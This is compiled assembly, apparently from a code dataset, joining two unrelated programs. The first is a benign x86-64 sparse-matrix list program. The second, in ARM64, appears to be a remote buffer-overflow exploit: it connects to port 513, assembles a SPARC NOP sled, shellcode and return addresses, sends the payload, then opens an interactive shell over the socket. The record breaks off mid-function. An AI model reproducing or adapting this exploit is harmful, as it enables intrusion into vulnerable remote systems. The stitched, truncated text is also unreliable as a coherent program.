je LBB1_25
## %bb.24: ## in Loop: Header=BB1_9 Depth=1
movq -8(%rbp), %rax
movq 16(%rax), %rax
movslq -48(%rbp), %rcx
movq (%rax,%rcx,8), %rax
movl 4(%rax), %eax
cmpl -52(%rbp), %eax
jle LBB1_26
LBB1_25: ## in Loop: Header=BB1_9 Depth=1
movq -8(%rbp), %rax
movq 16(%rax), %rax
movslq -48(%rbp), %rcx
movq (%rax,%rcx,8), %rcx
movq -16(%rbp), %rax
movq %rcx, 16(%rax)
movq -16(%rbp), %rdx
movq -8(%rbp), %rax
movq 16(%rax), %rax
movslq -48(%rbp), %rcx
movq %rdx, (%rax,%rcx,8)
jmp LBB1_32
LBB1_26: ## in Loop: Header=BB1_9 Depth=1
movq -8(%rbp), %rax
movq 16(%rax), %rax
movslq -48(%rbp), %rcx
movq (%rax,%rcx,8), %rax
movq %rax, -24(%rbp)
LBB1_27: ## Parent Loop BB1_9 Depth=1
## => This Inner Loop Header: Depth=2
movq -24(%rbp), %rcx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq $0, 16(%rcx)
movb %al, -69(%rbp) ## 1-byte Spill
je LBB1_29
## %bb.28: ## in Loop: Header=BB1_27 Depth=2
movq -24(%rbp), %rax
movq 16(%rax), %rax
movl 4(%rax), %eax
cmpl -52(%rbp), %eax
setl %al
movb %al, -69(%rbp) ## 1-byte Spill
LBB1_29: ## in Loop: Header=BB1_27 Depth=2
movb -69(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB1_30
jmp LBB1_31
LBB1_30: ## in Loop: Header=BB1_27 Depth=2
movq -24(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -24(%rbp)
jmp LBB1_27
LBB1_31: ## in Loop: Header=BB1_9 Depth=1
movq -24(%rbp), %rax
movq 16(%rax), %rcx
movq -16(%rbp), %rax
movq %rcx, 16(%rax)
movq -16(%rbp), %rcx
movq -24(%rbp), %rax
movq %rcx, 16(%rax)
LBB1_32: ## in Loop: Header=BB1_9 Depth=1
movq -8(%rbp), %rax
movq 24(%rax), %rax
movslq -52(%rbp), %rcx
cmpq $0, (%rax,%rcx,8)
je LBB1_34
## %bb.33: ## in Loop: Header=BB1_9 Depth=1
movq -8(%rbp), %rax
movq 24(%rax), %rax
movslq -52(%rbp), %rcx
movq (%rax,%rcx,8), %rax
movl (%rax), %eax
cmpl -48(%rbp), %eax
jle LBB1_35
LBB1_34: ## in Loop: Header=BB1_9 Depth=1
movq -8(%rbp), %rax
movq 24(%rax), %rax
movslq -52(%rbp), %rcx
movq (%rax,%rcx,8), %rcx
movq -16(%rbp), %rax
movq %rcx, 24(%rax)
movq -16(%rbp), %rdx
movq -8(%rbp), %rax
movq 24(%rax), %rax
movslq -52(%rbp), %rcx
movq %rdx, (%rax,%rcx,8)
jmp LBB1_41
LBB1_35: ## in Loop: Header=BB1_9 Depth=1
movq -8(%rbp), %rax
movq 24(%rax), %rax
movslq -52(%rbp), %rcx
movq (%rax,%rcx,8), %rax
movq %rax, -24(%rbp)
LBB1_36: ## Parent Loop BB1_9 Depth=1
## => This Inner Loop Header: Depth=2
movq -24(%rbp), %rcx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq $0, 24(%rcx)
movb %al, -70(%rbp) ## 1-byte Spill
je LBB1_38
## %bb.37: ## in Loop: Header=BB1_36 Depth=2
movq -24(%rbp), %rax
movq 24(%rax), %rax
movl (%rax), %eax
cmpl -48(%rbp), %eax
setl %al
movb %al, -70(%rbp) ## 1-byte Spill
LBB1_38: ## in Loop: Header=BB1_36 Depth=2
movb -70(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB1_39
jmp LBB1_40
LBB1_39: ## in Loop: Header=BB1_36 Depth=2
movq -24(%rbp), %rax
movq 24(%rax), %rax
movq %rax, -24(%rbp)
jmp LBB1_36
LBB1_40: ## in Loop: Header=BB1_9 Depth=1
movq -24(%rbp), %rax
movq 24(%rax), %rcx
movq -16(%rbp), %rax
movq %rcx, 24(%rax)
movq -16(%rbp), %rcx
movq -24(%rbp), %rax
movq %rcx, 24(%rax)
LBB1_41: ## in Loop: Header=BB1_9 Depth=1
jmp LBB1_42
LBB1_42: ## in Loop: Header=BB1_9 Depth=1
movl -60(%rbp), %eax
addl $1, %eax
movl %eax, -60(%rbp)
jmp LBB1_9
LBB1_43:
movl $1, %eax
addq $80, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _print_list ## -- Begin function print_list
.p2align 4, 0x90
_print_list: ## @print_list
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
leaq L_.str.5(%rip), %rdi
movb $0, %al
callq _printf
movl $1, -12(%rbp)
LBB2_1: ## =>This Loop Header: Depth=1
## Child Loop BB2_3 Depth 2
movl -12(%rbp), %eax
movq -8(%rbp), %rcx
cmpl (%rcx), %eax
jg LBB2_12
## %bb.2: ## in Loop: Header=BB2_1 Depth=1
movq -8(%rbp), %rax
movq 16(%rax), %rax
movslq -12(%rbp), %rcx
movq (%rax,%rcx,8), %rax
movq %rax, -24(%rbp)
movl $1, -16(%rbp)
LBB2_3: ## Parent Loop BB2_1 Depth=1
## => This Inner Loop Header: Depth=2
movl -16(%rbp), %eax
movq -8(%rbp), %rcx
cmpl 4(%rcx), %eax
jg LBB2_10
## %bb.4: ## in Loop: Header=BB2_3 Depth=2
cmpq $0, -24(%rbp)
je LBB2_7
## %bb.5: ## in Loop: Header=BB2_3 Depth=2
movq -24(%rbp), %rax
movl 4(%rax), %eax
cmpl -16(%rbp), %eax
jne LBB2_7
## %bb.6: ## in Loop: Header=BB2_3 Depth=2
movq -24(%rbp), %rax
movl 8(%rax), %esi
leaq L_.str.6(%rip), %rdi
movb $0, %al
callq _printf
movq -24(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -24(%rbp)
jmp LBB2_8
LBB2_7: ## in Loop: Header=BB2_3 Depth=2
leaq L_.str.6(%rip), %rdi
xorl %eax, %eax
movl %eax, %esi
movb $0, %al
callq _printf
LBB2_8: ## in Loop: Header=BB2_3 Depth=2
jmp LBB2_9
LBB2_9: ## in Loop: Header=BB2_3 Depth=2
movl -16(%rbp), %eax
addl $1, %eax
movl %eax, -16(%rbp)
jmp LBB2_3
LBB2_10: ## in Loop: Header=BB2_1 Depth=1
leaq L_.str.7(%rip), %rdi
movb $0, %al
callq _printf
## %bb.11: ## in Loop: Header=BB2_1 Depth=1
movl -12(%rbp), %eax
addl $1, %eax
movl %eax, -12(%rbp)
jmp LBB2_1
LBB2_12:
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl $0, -4(%rbp)
movq ___stdinp@GOTPCREL(%rip), %rax
movq (%rax), %rdx
leaq L_.str.8(%rip), %rdi
leaq L_.str.9(%rip), %rsi
callq _freopen
movq ___stdoutp@GOTPCREL(%rip), %rax
movq (%rax), %rdx
leaq L_.str.10(%rip), %rdi
leaq L_.str.11(%rip), %rsi
callq _freopen
movl $32, %edi
callq _malloc
movq %rax, -16(%rbp)
movq -16(%rbp), %rdi
callq _initCrossList
movq -16(%rbp), %rdi
callq _createCrossList
movq -16(%rbp), %rdi
callq _print_list
xorl %eax, %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "\350\276\223\345\205\245\347\250\200\347\226\217\347\237\251\351\230\265\347\232\204\350\241\214\357\274\214\345\210\227\344\273\245\345\217\212\351\235\236\351\233\266\345\205\203\347\264\240\344\270\252\346\225\260\n"
L_.str.1: ## @.str.1
.asciz "%d%d%d"
L_.str.2: ## @.str.2
.asciz "\350\276\223\345\205\245\351\235\236\351\233\266\345\205\203\347\264\240\350\241\214\357\274\214\345\210\227\357\274\214\351\235\236\351\233\266\345\205\203\347\264\240\n"
L_.str.3: ## @.str.3
.asciz "\344\275\215\347\275\256\344\270\215\345\220\210\346\263\225! \346\227\240\346\263\225\345\256\214\346\210\220\346\223\215\344\275\234!\n"
L_.str.4: ## @.str.4
.asciz "pause"
L_.str.5: ## @.str.5
.asciz "\347\250\200\347\226\217\347\237\251\351\230\265\344\270\272\n"
L_.str.6: ## @.str.6
.asciz "%d\t"
L_.str.7: ## @.str.7
.asciz "\n"
L_.str.8: ## @.str.8
.asciz "input.txt"
L_.str.9: ## @.str.9
.asciz "r"
L_.str.10: ## @.str.10
.asciz "output.txt"
L_.str.11: ## @.str.11
.asciz "w"
.subsections_via_symbols
| the_stack_data/94385.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
stp x28, x27, [sp, #-32]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
sub sp, sp, #3184
adrp x8, ___stderrp@GOTPAGE
ldr x8, [x8, ___stderrp@GOTPAGEOFF]
str x8, [sp, #96] ; 8-byte Folded Spill
stur wzr, [x29, #-20]
stur w0, [x29, #-24]
stur x1, [x29, #-32]
add x9, sp, #168
str x9, [sp, #160]
; kill: def $x9 killed $xzr
str xzr, [sp, #144]
adrp x9, l___const.main.term@PAGE
add x9, x9, l___const.main.term@PAGEOFF
ldr x11, [x9]
add x10, sp, #128
str x11, [sp, #128]
ldur w9, [x9, #7]
stur w9, [x10, #7]
mov w9, #10
str w9, [sp, #108]
str wzr, [sp, #104]
ldr x0, [x8]
mov x9, sp
adrp x8, l_.str.1@PAGE
add x8, x8, l_.str.1@PAGEOFF
str x8, [x9]
adrp x8, l_.str.2@PAGE
add x8, x8, l_.str.2@PAGEOFF
str x8, [x9, #8]
adrp x1, l_.str@PAGE
add x1, x1, l_.str@PAGEOFF
bl _fprintf
ldur w8, [x29, #-24]
subs w8, w8, #2
cset w8, ge
tbnz w8, #0, LBB0_2
b LBB0_1
LBB0_1:
ldur x8, [x29, #-32]
ldr x0, [x8]
bl _usage
b LBB0_2
LBB0_2:
b LBB0_3
LBB0_3: ; =>This Inner Loop Header: Depth=1
ldur w0, [x29, #-24]
ldur x1, [x29, #-32]
adrp x2, l_.str.3@PAGE
add x2, x2, l_.str.3@PAGEOFF
bl _getopt
strb w0, [sp, #159]
mov w8, #-1
subs w8, w8, w0, sxtb
cset w8, eq
tbnz w8, #0, LBB0_12
b LBB0_4
LBB0_4: ; in Loop: Header=BB0_3 Depth=1
ldrsb w8, [sp, #159]
str w8, [sp, #92] ; 4-byte Folded Spill
subs w8, w8, #100
cset w8, eq
tbnz w8, #0, LBB0_9
b LBB0_5
LBB0_5: ; in Loop: Header=BB0_3 Depth=1
ldr w8, [sp, #92] ; 4-byte Folded Reload
subs w8, w8, #104
cset w8, eq
tbnz w8, #0, LBB0_7
b LBB0_6
LBB0_6: ; in Loop: Header=BB0_3 Depth=1
ldr w8, [sp, #92] ; 4-byte Folded Reload
subs w8, w8, #116
cset w8, eq
tbnz w8, #0, LBB0_8
b LBB0_10
LBB0_7: ; in Loop: Header=BB0_3 Depth=1
adrp x8, _optarg@GOTPAGE
ldr x8, [x8, _optarg@GOTPAGEOFF]
ldr x8, [x8]
str x8, [sp, #144]
b LBB0_11
LBB0_8: ; in Loop: Header=BB0_3 Depth=1
adrp x8, _optarg@GOTPAGE
ldr x8, [x8, _optarg@GOTPAGEOFF]
ldr x0, [x8]
bl _atoi
str w0, [sp, #108]
b LBB0_11
LBB0_9: ; in Loop: Header=BB0_3 Depth=1
mov w8, #1
str w8, [sp, #104]
b LBB0_11
LBB0_10: ; in Loop: Header=BB0_3 Depth=1
ldur x8, [x29, #-32]
ldr x0, [x8]
bl _usage
b LBB0_11
LBB0_11: ; in Loop: Header=BB0_3 Depth=1
b LBB0_3
LBB0_12:
ldr x8, [sp, #144]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB0_14
b LBB0_13
LBB0_13:
ldur x8, [x29, #-32]
ldr x0, [x8]
bl _usage
b LBB0_14
LBB0_14:
ldr x0, [sp, #144]
mov w1, #513
mov w2, #10
bl _net_connect
ldr x8, [sp, #96] ; 8-byte Folded Reload
str w0, [sp, #124]
ldr x0, [x8]
ldr x8, [sp, #144]
mov x9, sp
str x8, [x9]
adrp x1, l_.str.4@PAGE
add x1, x1, l_.str.4@PAGEOFF
bl _fprintf
mov w0, #13
mov x1, #1
str x1, [sp, #80] ; 8-byte Folded Spill
bl _signal
add x0, sp, #168
str x0, [sp, #72] ; 8-byte Folded Spill
mov x1, #3000
bl _bzero
ldr x1, [sp, #72] ; 8-byte Folded Reload
ldr x2, [sp, #80] ; 8-byte Folded Reload
ldr w0, [sp, #124]
mov w3, #0
bl _send
subs x8, x0, #0
cset w8, ge
tbnz w8, #0, LBB0_16
b LBB0_15
LBB0_15:
bl ___error
ldr w0, [x0]
bl _strerror
mov x1, x0
ldr w2, [sp, #124]
adrp x0, l_.str.5@PAGE
add x0, x0, l_.str.5@PAGEOFF
bl _fatalerr
b LBB0_16
LBB0_16:
ldr w0, [sp, #124]
ldr w3, [sp, #108]
add x1, sp, #168
mov w2, #3000
bl _net_read
subs w8, w0, #0
cset w8, ge
tbnz w8, #0, LBB0_18
b LBB0_17
LBB0_17:
ldr w2, [sp, #124]
adrp x0, l_.str.6@PAGE
add x0, x0, l_.str.6@PAGEOFF
adrp x1, l_.str.7@PAGE
add x1, x1, l_.str.7@PAGEOFF
bl _fatalerr
b LBB0_18
LBB0_18:
ldr x0, [sp, #160]
adrp x1, l_.str.8@PAGE
add x1, x1, l_.str.8@PAGEOFF
mov x2, #3
str x2, [sp, #56] ; 8-byte Folded Spill
mov x3, #-1
str x3, [sp, #64] ; 8-byte Folded Spill
bl ___memcpy_chk
ldr x2, [sp, #56] ; 8-byte Folded Reload
ldr x3, [sp, #64] ; 8-byte Folded Reload
ldr x8, [sp, #160]
add x8, x8, #4
str x8, [sp, #160]
ldr x0, [sp, #160]
adrp x1, l_.str.9@PAGE
add x1, x1, l_.str.9@PAGEOFF
bl ___memcpy_chk
ldr x3, [sp, #64] ; 8-byte Folded Reload
ldr x8, [sp, #160]
add x8, x8, #4
str x8, [sp, #160]
ldr x0, [sp, #160]
add x1, sp, #128
mov x2, #11
bl ___memcpy_chk
ldr x8, [sp, #96] ; 8-byte Folded Reload
ldr x9, [sp, #160]
add x9, x9, #11
str x9, [sp, #160]
ldr x0, [x8]
adrp x1, l_.str.10@PAGE
add x1, x1, l_.str.10@PAGEOFF
bl _fprintf
ldr w0, [sp, #124]
ldr x8, [sp, #160]
add x1, sp, #168
mov x9, x1
subs x2, x8, x9
mov w3, #0
bl _send
subs x8, x0, #0
cset w8, ge
tbnz w8, #0, LBB0_20
b LBB0_19
LBB0_19:
bl ___error
ldr w0, [x0]
bl _strerror
mov x1, x0
ldr w2, [sp, #124]
adrp x0, l_.str.5@PAGE
add x0, x0, l_.str.5@PAGEOFF
bl _fatalerr
b LBB0_20
LBB0_20:
str wzr, [sp, #116]
add x0, sp, #168
mov x1, #3000
bl _bzero
b LBB0_21
LBB0_21: ; =>This Inner Loop Header: Depth=1
ldr w0, [sp, #124]
ldr w3, [sp, #108]
add x1, sp, #168
mov w2, #3000
bl _net_read
subs w8, w0, #0
cset w8, eq
tbnz w8, #0, LBB0_25
b LBB0_22
LBB0_22: ; in Loop: Header=BB0_21 Depth=1
add x0, sp, #168
adrp x1, l_.str.11@PAGE
add x1, x1, l_.str.11@PAGEOFF
bl _strstr
subs x8, x0, #0
cset w8, eq
tbnz w8, #0, LBB0_24
b LBB0_23
LBB0_23:
mov w8, #1
str w8, [sp, #116]
b LBB0_25
LBB0_24: ; in Loop: Header=BB0_21 Depth=1
add x0, sp, #168
mov x1, #3000
bl _bzero
b LBB0_21
LBB0_25:
ldr w8, [sp, #116]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_27
b LBB0_26
LBB0_26:
ldr w2, [sp, #124]
adrp x0, l_.str.6@PAGE
add x0, x0, l_.str.6@PAGEOFF
adrp x1, l_.str.12@PAGE
add x1, x1, l_.str.12@PAGEOFF
bl _fatalerr
b LBB0_27
LBB0_27:
ldr w0, [sp, #124]
adrp x1, l_.str.13@PAGE
add x1, x1, l_.str.13@PAGEOFF
mov x2, #5
mov w3, #0
bl _send
subs x8, x0, #0
cset w8, ge
tbnz w8, #0, LBB0_29
b LBB0_28
LBB0_28:
bl ___error
ldr w0, [x0]
bl _strerror
mov x1, x0
ldr w2, [sp, #124]
adrp x0, l_.str.5@PAGE
add x0, x0, l_.str.5@PAGEOFF
bl _fatalerr
b LBB0_29
LBB0_29:
str wzr, [sp, #116]
add x0, sp, #168
mov x1, #3000
bl _bzero
ldr x8, [sp, #96] ; 8-byte Folded Reload
ldr x0, [x8]
adrp x1, l_.str.14@PAGE
add x1, x1, l_.str.14@PAGEOFF
bl _fprintf
b LBB0_30
LBB0_30: ; =>This Inner Loop Header: Depth=1
ldr w0, [sp, #124]
ldr w3, [sp, #108]
add x1, sp, #168
mov w2, #3000
bl _net_read
subs w8, w0, #0
cset w8, eq
tbnz w8, #0, LBB0_34
b LBB0_31
LBB0_31: ; in Loop: Header=BB0_30 Depth=1
add x0, sp, #168
adrp x1, l_.str.15@PAGE
add x1, x1, l_.str.15@PAGEOFF
bl _strstr
subs x8, x0, #0
cset w8, eq
tbnz w8, #0, LBB0_33
b LBB0_32
LBB0_32:
mov w8, #1
str w8, [sp, #116]
b LBB0_34
LBB0_33: ; in Loop: Header=BB0_30 Depth=1
add x0, sp, #168
mov x1, #3000
bl _bzero
b LBB0_30
LBB0_34:
ldr w8, [sp, #116]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_36
b LBB0_35
LBB0_35:
ldr w2, [sp, #124]
adrp x0, l_.str.6@PAGE
add x0, x0, l_.str.6@PAGEOFF
adrp x1, l_.str.16@PAGE
add x1, x1, l_.str.16@PAGEOFF
bl _fatalerr
b LBB0_36
LBB0_36:
ldr x8, [sp, #96] ; 8-byte Folded Reload
ldr x0, [x8]
mov x9, sp
mov x8, #29060
movk x8, #2, lsl #16
str x8, [x9]
adrp x1, l_.str.17@PAGE
add x1, x1, l_.str.17@PAGEOFF
bl _fprintf
ldr w8, [sp, #104]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_38
b LBB0_37
LBB0_37:
adrp x0, l_.str.18@PAGE
add x0, x0, l_.str.18@PAGEOFF
bl _printf
mov x9, sp
add x8, sp, #159
str x8, [x9]
adrp x0, l_.str.19@PAGE
add x0, x0, l_.str.19@PAGEOFF
bl _scanf
b LBB0_38
LBB0_38:
add x0, sp, #168
str x0, [sp, #40] ; 8-byte Folded Spill
mov x1, #3000
bl _bzero
ldr x8, [sp, #40] ; 8-byte Folded Reload
str x8, [sp, #160]
ldr x0, [sp, #160]
adrp x1, l_.str.20@PAGE
add x1, x1, l_.str.20@PAGEOFF
mov x2, #4
mov x3, #-1
str x3, [sp, #48] ; 8-byte Folded Spill
bl ___memcpy_chk
ldr x8, [sp, #160]
add x8, x8, #4
str x8, [sp, #160]
ldr x0, [sp, #160]
mov w1, #0
mov w2, #29060
movk w2, #2, lsl #16
bl _set_val
ldr x3, [sp, #48] ; 8-byte Folded Reload
ldr x8, [sp, #160]
add x8, x8, #4
str x8, [sp, #160]
ldr x0, [sp, #160]
adrp x1, l_.str.21@PAGE
add x1, x1, l_.str.21@PAGEOFF
mov x2, #1
bl ___memcpy_chk
ldr x8, [sp, #160]
add x8, x8, #1
str x8, [sp, #160]
str wzr, [sp, #120]
b LBB0_39
LBB0_39: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #120]
subs w8, w8, #60
cset w8, ge
tbnz w8, #0, LBB0_42
b LBB0_40
LBB0_40: ; in Loop: Header=BB0_39 Depth=1
ldr x0, [sp, #160]
adrp x1, l_.str.22@PAGE
add x1, x1, l_.str.22@PAGEOFF
mov x2, #2
mov x3, #-1
bl ___memcpy_chk
b LBB0_41
LBB0_41: ; in Loop: Header=BB0_39 Depth=1
ldr w8, [sp, #120]
add w8, w8, #1
str w8, [sp, #120]
ldr x8, [sp, #160]
add x8, x8, #2
str x8, [sp, #160]
b LBB0_39
LBB0_42:
ldr x0, [sp, #160]
adrp x1, l_.str.23@PAGE
add x1, x1, l_.str.23@PAGEOFF
mov x2, #4
mov x3, #-1
bl ___memcpy_chk
ldr x8, [sp, #160]
add x8, x8, #4
str x8, [sp, #160]
str wzr, [sp, #120]
b LBB0_43
LBB0_43: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #120]
subs w8, w8, #398
cset w8, ge
tbnz w8, #0, LBB0_46
b LBB0_44
LBB0_44: ; in Loop: Header=BB0_43 Depth=1
ldr x0, [sp, #160]
adrp x1, _sparc_nop@PAGE
add x1, x1, _sparc_nop@PAGEOFF
mov x2, #4
mov x3, #-1
bl ___memcpy_chk
b LBB0_45
LBB0_45: ; in Loop: Header=BB0_43 Depth=1
ldr w8, [sp, #120]
add w8, w8, #1
str w8, [sp, #120]
ldr x8, [sp, #160]
add x8, x8, #4
str x8, [sp, #160]
b LBB0_43
LBB0_46:
ldr x0, [sp, #160]
adrp x1, _sc@PAGE
add x1, x1, _sc@PAGEOFF
mov x2, #64
bl _sc_copy
ldr x8, [sp, #160]
add x8, x8, w0, sxtw
str x8, [sp, #160]
ldr x0, [sp, #160]
adrp x1, l_.str.24@PAGE
add x1, x1, l_.str.24@PAGEOFF
mov x2, #4
mov x3, #-1
str x3, [sp, #24] ; 8-byte Folded Spill
bl ___memcpy_chk
ldr x3, [sp, #24] ; 8-byte Folded Reload
ldr x8, [sp, #160]
add x8, x8, #4
str x8, [sp, #160]
ldr x0, [sp, #160]
adrp x1, l_.str.25@PAGE
add x1, x1, l_.str.25@PAGEOFF
mov x2, #16
bl ___memcpy_chk
ldr x8, [sp, #160]
add x8, x8, #16
str x8, [sp, #160]
ldr x0, [sp, #160]
mov w1, #0
str w1, [sp, #36] ; 4-byte Folded Spill
mov w2, #29060
movk w2, #2, lsl #16
bl _set_val
ldr w1, [sp, #36] ; 4-byte Folded Reload
ldr x8, [sp, #160]
add x8, x8, #4
str x8, [sp, #160]
ldr x0, [sp, #160]
mov w2, #1
bl _set_val
ldr x8, [sp, #160]
add x8, x8, #4
str x8, [sp, #160]
str wzr, [sp, #120]
b LBB0_47
LBB0_47: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #120]
subs w8, w8, #52
cset w8, ge
tbnz w8, #0, LBB0_50
b LBB0_48
LBB0_48: ; in Loop: Header=BB0_47 Depth=1
ldr x0, [sp, #160]
mov w2, #0
mov x1, x2
bl _set_val
b LBB0_49
LBB0_49: ; in Loop: Header=BB0_47 Depth=1
ldr w8, [sp, #120]
add w8, w8, #1
str w8, [sp, #120]
ldr x8, [sp, #160]
add x8, x8, #4
str x8, [sp, #160]
b LBB0_47
LBB0_50:
ldr x0, [sp, #160]
adrp x1, l_.str.26@PAGE
add x1, x1, l_.str.26@PAGEOFF
mov x2, #9
mov x3, #-1
bl ___memcpy_chk
ldr x8, [sp, #160]
add x8, x8, #9
str x8, [sp, #160]
ldr x9, [sp, #160]
add x8, sp, #168
mov x10, x8
subs x9, x9, x10
; kill: def $w9 killed $w9 killed $x9
str w9, [sp, #112]
str x8, [sp, #160]
b LBB0_51
LBB0_51: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #112]
subs w8, w8, #0
cset w8, le
tbnz w8, #0, LBB0_58
b LBB0_52
LBB0_52: ; in Loop: Header=BB0_51 Depth=1
ldr x8, [sp, #96] ; 8-byte Folded Reload
ldr x0, [x8]
adrp x1, l_.str.27@PAGE
add x1, x1, l_.str.27@PAGEOFF
bl _fprintf
ldr w8, [sp, #112]
subs w8, w8, #256
cset w8, le
tbnz w8, #0, LBB0_54
b LBB0_53
LBB0_53: ; in Loop: Header=BB0_51 Depth=1
mov w8, #256
str w8, [sp, #20] ; 4-byte Folded Spill
b LBB0_55
LBB0_54: ; in Loop: Header=BB0_51 Depth=1
ldr w8, [sp, #112]
str w8, [sp, #20] ; 4-byte Folded Spill
b LBB0_55
LBB0_55: ; in Loop: Header=BB0_51 Depth=1
ldr w8, [sp, #20] ; 4-byte Folded Reload
str w8, [sp, #120]
ldr w0, [sp, #124]
ldr x1, [sp, #160]
ldrsw x2, [sp, #120]
mov w3, #0
bl _send
ldr w9, [sp, #120]
ldr w8, [sp, #112]
subs w8, w8, w9
str w8, [sp, #112]
ldrsw x9, [sp, #120]
ldr x8, [sp, #160]
add x8, x8, x9
str x8, [sp, #160]
ldr w8, [sp, #112]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB0_57
b LBB0_56
LBB0_56: ; in Loop: Header=BB0_51 Depth=1
ldr w0, [sp, #124]
adrp x1, l_.str.28@PAGE
add x1, x1, l_.str.28@PAGEOFF
mov x2, #1
mov w3, #0
bl _send
b LBB0_57
LBB0_57: ; in Loop: Header=BB0_51 Depth=1
mov w0, #41248
movk w0, #7, lsl #16
bl _usleep
b LBB0_51
LBB0_58:
ldr x8, [sp, #96] ; 8-byte Folded Reload
ldr x0, [x8]
adrp x1, l_.str.29@PAGE
add x1, x1, l_.str.29@PAGEOFF
bl _fprintf
str wzr, [sp, #116]
add x0, sp, #168
mov x1, #3000
bl _bzero
ldr x8, [sp, #96] ; 8-byte Folded Reload
ldr x0, [x8]
adrp x1, l_.str.30@PAGE
add x1, x1, l_.str.30@PAGEOFF
bl _fprintf
b LBB0_59
LBB0_59: ; =>This Inner Loop Header: Depth=1
ldr w0, [sp, #124]
ldr w3, [sp, #108]
add x1, sp, #168
mov w2, #3000
bl _net_read
subs w8, w0, #0
cset w8, eq
tbnz w8, #0, LBB0_63
b LBB0_60
LBB0_60: ; in Loop: Header=BB0_59 Depth=1
add x0, sp, #168
adrp x1, l_.str.11@PAGE
add x1, x1, l_.str.11@PAGEOFF
bl _strstr
subs x8, x0, #0
cset w8, eq
tbnz w8, #0, LBB0_62
b LBB0_61
LBB0_61:
mov w8, #1
str w8, [sp, #116]
b LBB0_63
LBB0_62: ; in Loop: Header=BB0_59 Depth=1
add x0, sp, #168
mov x1, #3000
bl _bzero
b LBB0_59
LBB0_63:
ldr w8, [sp, #116]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_65
b LBB0_64
LBB0_64:
ldr w2, [sp, #124]
adrp x0, l_.str.6@PAGE
add x0, x0, l_.str.6@PAGEOFF
adrp x1, l_.str.31@PAGE
add x1, x1, l_.str.31@PAGEOFF
bl _fatalerr
b LBB0_65
LBB0_65:
ldr x8, [sp, #96] ; 8-byte Folded Reload
ldr x0, [x8]
adrp x1, l_.str.32@PAGE
add x1, x1, l_.str.32@PAGEOFF
bl _fprintf
ldr w0, [sp, #124]
adrp x1, l_.str.13@PAGE
add x1, x1, l_.str.13@PAGEOFF
mov x2, #5
mov w3, #0
bl _send
subs x8, x0, #0
cset w8, ge
tbnz w8, #0, LBB0_67
b LBB0_66
LBB0_66:
bl ___error
ldr w0, [x0]
bl _strerror
mov x1, x0
ldr w2, [sp, #124]
adrp x0, l_.str.5@PAGE
add x0, x0, l_.str.5@PAGEOFF
bl _fatalerr
b LBB0_67
LBB0_67:
add x0, sp, #168
mov x1, #3000
bl _bzero
str wzr, [sp, #116]
b LBB0_68
LBB0_68: ; =>This Inner Loop Header: Depth=1
ldr w0, [sp, #124]
ldr w3, [sp, #108]
add x1, sp, #168
mov w2, #3000
bl _net_read
subs w8, w0, #0
cset w8, eq
tbnz w8, #0, LBB0_72
b LBB0_69
LBB0_69: ; in Loop: Header=BB0_68 Depth=1
add x0, sp, #168
adrp x1, l_.str.33@PAGE
add x1, x1, l_.str.33@PAGEOFF
bl _strstr
subs x8, x0, #0
cset w8, eq
tbnz w8, #0, LBB0_71
b LBB0_70
LBB0_70:
mov w8, #1
str w8, [sp, #116]
b LBB0_72
LBB0_71: ; in Loop: Header=BB0_68 Depth=1
add x0, sp, #168
mov x1, #3000
bl _bzero
b LBB0_68
LBB0_72:
ldr w8, [sp, #116]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB0_74
b LBB0_73
LBB0_73:
ldr w2, [sp, #124]
adrp x0, l_.str.6@PAGE
add x0, x0, l_.str.6@PAGEOFF
adrp x1, l_.str.31@PAGE
add x1, x1, l_.str.31@PAGEOFF
bl _fatalerr
b LBB0_74
LBB0_74:
ldr x8, [sp, #96] ; 8-byte Folded Reload
ldr x0, [x8]
adrp x1, l_.str.34@PAGE
add x1, x1, l_.str.34@PAGEOFF
bl _fprintf
ldr w0, [sp, #124]
bl _shell
mov w0, #0
bl _exit
.cfi_endproc
; -- End function
.globl _usage ; -- Begin function usage
.p2align 2
_usage: ; @usage
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stderrp@GOTPAGE
ldr x8, [x8, ___stderrp@GOTPAGEOFF]
str x8, [sp, #16] ; 8-byte Folded Spill
stur x0, [x29, #-8]
ldr x0, [x8]
ldur x8, [x29, #-8]
mov x9, sp
